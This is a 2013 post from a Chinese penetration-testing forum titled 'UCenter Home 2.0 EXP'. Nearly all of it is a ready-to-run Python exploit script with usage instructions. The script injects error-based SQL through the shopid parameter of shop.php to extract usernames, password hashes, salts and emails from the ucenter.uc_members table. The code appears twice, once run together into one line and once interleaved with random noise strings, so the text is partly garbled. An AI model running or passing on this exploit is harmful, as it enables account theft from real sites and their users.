找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2046|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl- ^3 x$ p. ?- U  d9 D

& S8 t9 L* q6 n4 i4 O
- O9 F* N' S( z0 Y. I, l0 ]" N#!/usr/bin/env python  
2 W+ M2 D4 G5 K: t1 W- m; R* K0 d , H5 x$ n* S" k7 L" x; V! M+ F
import sys  
) K# H4 w4 F! ~import urllib2  
- ?# N* e# j' G% P6 v( Eimport re  ; m. W, ^( a* m- [. w! A2 C' P1 i

: v3 ]' H+ c! |' Gdef info():  
- r+ k7 c; |' b; {* c4 B    print 'From:http://www.exploit-db.com/exploits/14997/' ; J9 ]. }8 }) Q! j- D, V0 H
    print 'http://www.hake.cc/Web_loudong/' * v  W' u' n* ~" o/ W- |* a; d
    print 'changed:qiaoy'  4 w* ?8 F- k& R7 {& I/ z4 r
    print 'exp:'  / h0 T" G" T* I0 n# t8 b( F  c  I2 N1 K
    print ' ./UCenter_Home_2.0.py site'  
% c: s3 ?! K3 l# ]  ~5 O, k* Z/ q & w. }" D. C" z: ~' u
def main():  
, p3 x3 K( O* Y3 p6 h- H    if len(sys.argv) != 2:  * ?. j" e3 `8 o" i8 F3 @/ ~
        info()  
4 i5 ]8 S6 a0 p3 G6 S    else:  
" q; v/ C1 Z  f8 f$ u/ _1 h        site = sys.argv[1]  
/ b9 A3 B# _6 J4 o6 ~) ]" I) l* Q. Y& Y        if site[0:7] == 'http://':  
* U' Y/ s; g& f2 O* C            sitesite =site  
1 e0 d# s/ M* Q4 o' ~        elif site[0:8] == 'https://':  " H5 i0 [% h' E0 V" ~; f+ K
            sitesite = site  . {4 T4 n& s% X/ Z4 Z3 D& k% s
        else:  
8 g, X3 {! S% G! }$ R            site = 'http://'+site  ; s4 m# s$ k7 S
        try:  & d9 C( }' b( p, U
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
* s! g& B+ a( |1 l; N8 X) d            Value = urllib2.urlopen(url).read()  4 @7 ^0 t9 m# Q+ t9 D
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ' l; H1 H. C8 Q  ?) X6 T
            hacked = Msg.split(':')  
3 M- H+ q$ p. |& F            print 'Name:    '+hacked[1]  . |  F+ X" y6 h- b- E9 Z" n- C
            print 'Passwd:  '+hacked[2]  ! s3 T( y7 o1 q* N
            print 'salt:    '+hacked[3]  
2 }4 d/ E+ R* X! H9 D. w% i& U            print 'email:   '+hacked[4]  & R3 n3 Z* h. A; H9 c
        except:  % _) w  I- k4 |7 P$ [! I& x0 k% N+ }
            print 'Sorry,I can\'t work............'  $ L+ {) H9 g/ H

. m8 V6 N; f6 d, i- uif __name__ == '__main__':  
6 H" Z: z0 [' _7 j" n' J    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表